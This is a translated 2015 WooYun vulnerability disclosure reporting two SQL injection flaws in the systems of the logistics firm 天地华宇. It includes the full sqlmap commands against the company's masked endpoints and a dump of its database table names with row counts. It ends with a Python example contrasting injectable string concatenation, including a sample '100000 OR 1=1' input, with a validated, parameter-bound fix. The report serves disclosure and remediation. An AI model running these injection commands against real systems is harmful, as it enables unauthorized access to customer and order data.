
Vulnerability summary (24 watchers)

Defect ID: wooyun-2015-0139189

Title: Express-delivery security: two SQL injection flaws at 天地华宇 exposing a large amount of information

Affected vendor: 天地华宇

Author: lightless

Submitted: 2015-09-10 21:11

Fixed: 2015-10-26 10:52

Published: 2015-10-26 10:52

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org. For questions or assistance, contact [email protected]



Vulnerability details

Disclosure status:

2015-09-10: Details sent to the vendor; awaiting vendor handling
2015-09-11: CNCERT (National Internet Emergency Center) could not yet reach the relevant organisation; details disclosed only to the notifying body
2015-09-21: Details disclosed to core white hats and domain experts
2015-10-01: Details disclosed to regular white hats
2015-10-11: Details disclosed to intern white hats
2015-10-26: Details disclosed to the public

Brief description:

A human-shaped divine artifact~

Detailed description:

Two injection points
Case 1:

D:\Tools\WEB\sqlmap>python sqlmap.py -u "http://**.**.**.**:9080/PriceQuery?shipperCity=%25E5%258C%2597%25E4%25BA%25AC%25E5%25B8%2582&conCity=%25E5%258C%2597%25E4%25BA%25AC%25E5%25B8%2582&shipperCounty=%25E8%25A5%25BF%25E5%259F%258E%25E5%258C%25BA&conCounty=%25E4%25B8%259C%25E5%259F%258E%25E5%258C%25BA&ebProductTypeId=100000&t=1441445465464" -p ebProductTypeId --random-agent --tamper=space2comment -D "thoms" --tables --count


Case 2:

D:\Tools\WEB\sqlmap>python sqlmap.py -u "http://**.**.**.**/05xgnew/Default.aspx" --data "__VIEWSTATE=%2FwEPDwUKLTUwOTQ0NDQ3MWRktA6PBCi8proujSc4OHkUB7epxyA%3D&gh=1&mm=1&btn=%B5%C7%C2%BC&__EVENTVALIDATION=%2FwEWBAK%2FjdP5AQK578rvDALD77bvDAKSoqqWD8OU6dcTGppipGwM0u%2B3IgB7ezme" -p gh --random-agent --dbs


Case 2 is a time-based blind injection, which is far too slow...

Proof of vulnerability:

Case 1:

Database: thoms
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| dbo.CD_STATUS_HISTORY | 7876790 |
| dbo.EO_ORDER_MATERIEL | 1763946 |
| dbo.OMS_DC_ORDER | 1242568 |
| dbo.EO_ORDER_EXCEPTION_HISTORY | 460400 |
| dbo.EB_MOBILE_CONTACT | 417779 |
| dbo.EB_PRODUCT_DETAIL | 400910 |
| dbo.EO_DISTPACH_VEHICLE | 384321 |
| dbo.EI_ALIBABA_ORDER_STATUS | 380105 |
| dbo.EB_PRODUCT_DETAIL_BACK | 285028 |
| dbo.EO_ORDER | 159037 |
| dbo.EI_TAOBAO_CARGO | 122364 |
| dbo.EB_SATISFY | 72506 |
| dbo.EI_TAOBAO_ORDER | 59354 |
| dbo.EI_NET_ORDER | 30599 |
| dbo.TMP_PRICE | 23231 |
| dbo.EB_CUSTOMER | 22919 |
| dbo.EB_CUSTOMER_CONTACT | 22904 |
| dbo.EB_NET_SERIAL | 17053 |
| dbo.EB_OMS_HR | 16905 |
| dbo.CD_MESSAGE_CONTEXT | 13739 |
| dbo.EO_ORDER_EXCEPTION | 13157 |
| dbo.EB_SHIPPER_ADDRESS | 9638 |
| dbo.OMS_PRICE_FREIGHT | 5791 |
| dbo.EI_NET_ORDER_RECORD | 5246 |
| dbo.EB_DISCOUNT | 4216 |
| dbo.ES_ESUG_2_ESUS | 3671 |
| dbo.ES_USER | 3660 |
| dbo.EB_PLACE | 3409 |
| dbo.EB_PLACE_BAK | 3409 |
| dbo.EB_PLACE_PMS | 3398 |
| dbo.EI_CUSTOMER_ORDER_CARGO | 3151 |
| dbo.EI_CUSTOMER_ORDER | 3147 |
| dbo.EB_CUSTOMER_DISCOUNT | 3006 |
| dbo.tmp_city_con | 2997 |
| dbo.EB_VEHICLE | 2554 |
| dbo.ES_CONTROL_PARAM | 1978 |
| dbo.ES_ESCO_2_ESCP | 1967 |
| dbo.ES_COMPANY | 1802 |
| dbo.EB_OUT_CUSTOMER | 726 |
| dbo.ES_ESRO_2_ESFR | 666 |
| dbo.EB_CODE_MASTER | 651 |
| dbo.ES_ESHP_2_ESCO | 625 |
| dbo.ES_FUNCTION_RESOURCE | 444 |
| dbo.ES_FUNCTION_PERMISSION | 361 |
| dbo.EB_CODE_MASTER_TYPE | 113 |
| dbo.ES_ESHP_2_ESUS | 89 |
| dbo.ES_HOOD_PLATFORM | 86 |
| dbo.ES_ESIE_2_ESDR | 72 |
| dbo.CD_STATUS_ACTION | 67 |
| dbo.ES_DATASOURCE_RES | 67 |
| dbo.CD_EXCEPTION_ITEM | 50 |
| dbo.CD_ACTION_DEFINED | 29 |
| dbo.CD_ACTION_DEFINED_copy | 29 |
| dbo.ES_ESUG_2_ESRO | 28 |
| dbo.CD_STATUSES_DETAIL | 22 |
| dbo.EB_ORDER_TYPE | 22 |
| dbo.EB_CUSTOMER_ROLE | 16 |
| dbo.ES_USER_2_POST | 16 |
| dbo.ES_ROLE | 12 |
| dbo.ES_USER_GROUP | 11 |
| dbo.EB_SHIPPER | 8 |
| dbo.CD_STATUS_SMS | 6 |
| dbo.CD_NOTIFY_EXCEPTION | 5 |
| dbo.CD_TIMER_ACTION | 5 |
| dbo.CD_TIMER_DEFINE | 5 |
| dbo.EB_CUSTOMER_URL | 4 |
| dbo.EB_EBPJ_2_ESUS | 4 |
| dbo.EB_SERVICES | 4 |
| dbo.ES_COUNTER | 4 |
| dbo.ES_DATASOURCE | 4 |
| dbo.ES_DIY_REPORT | 4 |
| dbo.CD_BILL_NO_RULE | 3 |
| dbo.EB_PRODUCT_TYPE | 3 |
| dbo.OMS_PRICE_CUSTOMER | 3 |
| dbo.OMS_PRICE_HEAD | 3 |
| dbo.CD_STATUSES_HEADER | 2 |
| dbo.COUNTY_FIRSTCOMPANY | 2 |
| dbo.EB_CUSTOMER_CHECK | 2 |
| dbo.EB_CUSTOMER_MILEAGE | 2 |
| dbo.EB_EBCU_2_EBSP | 2 |
| dbo.EB_REGION | 2 |
| dbo.EO_TYPE_CONTENT | 2 |
| dbo.TMP_CITY | 2 |
| dbo.DISCOUNT | 1 |
| dbo.EB_CERTIFICATION | 1 |
| dbo.EB_EBPJ_2_EBCC | 1 |
| dbo.EB_FEE_HEAD | 1 |
| dbo.EB_LINE | 1 |
| dbo.EB_ORDER_TASK | 1 |
| dbo.EB_PORT | 1 |
| dbo.EB_PROJECT | 1 |
| dbo.EO_ORDER_ANOMALY | 1 |
| dbo.ES_DEPARTMENT | 1 |
| dbo.ES_ESDA_2_ESCO | 1 |
| dbo.ES_MESSAGE_TYPE | 1 |
| dbo.ES_STATION | 1 |
+--------------------------------+---------+


[Screenshot: 1.png]


Case 2:

[Screenshot: 2.png]


[Screenshot: 3.png]


[Screenshot: 4.png]


Too slow, so I stopped running it; demonstrating the problem is enough.

Remediation:

Filter input; take deprecated systems offline promptly.
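As an added illustration of the remediation (this is example code, not code from the report or from the vendor's application): the pattern behind an injectable integer parameter such as ebProductTypeId is splicing the request value straight into the SQL text, and the fix is a strict allow-list check on the value followed by a bound query parameter. The table name tmp_price, its columns and the sample rows are constructed here, since the page lists table names only and no schema; an in-memory SQLite database stands in for the production server so the example runs offline, but parameter binding works the same way with an MSSQL driver.

```python
import re
import sqlite3

# Constructed sample rows standing in for a freight price table; the
# report shows table names only, not a schema, so this one is invented.
SAMPLE_ROWS = [
    (100000, "Beijing", "Beijing", 12.5),
    (100001, "Beijing", "Shanghai", 18.0),
    (100002, "Shanghai", "Guangzhou", 21.0),
]

# ebProductTypeId is sent as an integer in the request on the page;
# accept only a short run of ASCII digits, nothing else.
PRODUCT_TYPE_ID_RE = re.compile(r"[0-9]{1,9}")


def _connect() -> sqlite3.Connection:
    """In-memory SQLite stand-in for the production database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE tmp_price ("
        "product_type_id INTEGER, shipper_city TEXT, con_city TEXT, price REAL)"
    )
    conn.executemany("INSERT INTO tmp_price VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def price_query_vulnerable(product_type_id: str) -> list:
    """The flawed pattern: the request parameter is concatenated into the
    SQL text, so whatever the client sends becomes part of the statement."""
    conn = _connect()
    sql = ("SELECT product_type_id, price FROM tmp_price "
           "WHERE product_type_id = " + product_type_id)
    return conn.execute(sql).fetchall()


def validate_product_type_id(raw: str) -> bool:
    """Allow-list check: the parameter must be a short string of digits."""
    return PRODUCT_TYPE_ID_RE.fullmatch(raw) is not None


def price_query_hardened(product_type_id: str) -> list:
    """Hardened form: reject anything that is not an integer, then bind the
    value as a query parameter so the driver never treats it as SQL."""
    if not validate_product_type_id(product_type_id):
        raise ValueError("ebProductTypeId must be a non-negative integer")
    conn = _connect()
    sql = ("SELECT product_type_id, price FROM tmp_price "
           "WHERE product_type_id = ?")
    return conn.execute(sql, (int(product_type_id),)).fetchall()


if __name__ == "__main__":
    print(price_query_vulnerable("100000"))           # one matching row
    print(price_query_vulnerable("100000 OR 1=1"))    # every row: the condition was injected
    print(validate_product_type_id("100000 OR 1=1"))  # False: rejected before any query runs
    print(price_query_hardened("100000"))             # one matching row
```

Two layers matter here: the allow-list check stops malformed values at the edge, and the bound parameter means that even a value which slips past validation in some other code path is sent to the database as data rather than as SQL. The same binding discipline applies to the login parameter in Case 2, where the report's time-based blind injection shows that string values need it just as much as integers.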

Copyright notice: when reposting, please credit the source: lightless@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 7

Confirmed: 2015-09-11 10:50

Vendor reply:

CNVD could not reproduce the described situation; it has not yet been entered into the handling process.

Latest status:

None